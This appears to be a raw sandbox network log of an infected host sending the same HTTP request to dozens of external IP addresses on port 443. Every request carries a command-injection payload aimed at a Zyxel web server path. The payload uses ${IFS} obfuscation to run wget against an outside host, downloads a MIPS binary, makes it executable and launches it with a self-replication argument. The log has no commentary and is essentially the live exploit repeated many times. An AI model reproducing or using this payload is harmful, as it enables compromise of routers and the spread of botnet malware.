                                                        Jan 28, 2024 10:13:09.742636919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8800192.168.2.143945241.110.120.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742672920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8801192.168.2.1444252196.120.251.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742706060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8802192.168.2.1448848163.58.211.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742743015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8803192.168.2.1456284171.117.14.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742791891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8804192.168.2.1441386155.201.69.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742826939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8805192.168.2.145337878.46.66.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742866039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8806192.168.2.146099644.138.90.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742906094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8807192.168.2.1455240106.29.34.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742939949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8808192.168.2.1438316193.182.27.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.742966890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8809192.168.2.1449882143.21.199.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743017912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8810192.168.2.14530502.153.175.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743069887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8811192.168.2.1444266191.88.155.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743097067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8812192.168.2.144446051.171.23.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743128061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8813192.168.2.1441870152.107.83.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743180990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8814192.168.2.1436286201.68.245.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743201017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8815192.168.2.1449286162.244.119.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743268013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8816192.168.2.1447512138.3.89.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743314028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8817192.168.2.144560413.176.249.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743341923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8818192.168.2.1456220165.5.35.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743376970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8819192.168.2.1458348166.54.134.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743400097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8820192.168.2.1436168222.151.144.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743436098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8821192.168.2.144587457.103.203.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743474007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8822192.168.2.143803878.95.28.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743515015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8823192.168.2.144593449.247.146.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743562937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8824192.168.2.144603471.195.33.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743603945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8825192.168.2.1438034116.75.241.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743640900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8826192.168.2.144717252.6.26.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743694067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8827192.168.2.1451020137.161.147.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743726015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8828192.168.2.1438132113.16.103.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743771076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8829192.168.2.1438900170.89.85.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743813992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8830192.168.2.145704025.245.113.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743853092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8831192.168.2.1445128156.154.131.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743875980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8832192.168.2.1452302106.66.138.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743927956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8833192.168.2.1440090162.10.167.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.743972063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8834192.168.2.1458922144.157.250.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.744007111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8835192.168.2.145187866.212.99.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739196062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8836192.168.2.1441438219.220.27.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739358902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8837192.168.2.1459854183.188.20.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739389896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8838192.168.2.144284625.143.57.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739419937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8839192.168.2.1457456169.114.233.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739465952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8840192.168.2.1441640181.211.79.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739506960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8841192.168.2.143493013.193.9.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739538908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8842192.168.2.1449852112.45.147.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739615917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8843192.168.2.143687497.253.174.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739655972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8844192.168.2.1457062148.198.117.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739702940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8845192.168.2.1433324188.170.237.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739742041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8846192.168.2.1439762151.228.119.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739763975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8847192.168.2.143571441.220.84.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739803076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8848192.168.2.145770663.166.209.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739857912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8849192.168.2.145493090.220.170.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739897013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8850192.168.2.145451825.201.110.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739897013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8851192.168.2.1433652218.44.75.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739938974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8852192.168.2.1459530194.195.55.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.739990950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8853192.168.2.144324841.91.73.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740025043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8854192.168.2.14344144.28.118.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740083933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8855192.168.2.1449662119.116.122.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740129948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8856192.168.2.144314224.84.211.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740179062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8857192.168.2.1453304105.58.122.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740212917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8858192.168.2.14481085.58.203.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740263939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8859192.168.2.1446874114.229.254.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:10.740302086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8860192.168.2.14499964.249.231.32443
                                                        TimestampBytes transferredDirectionData
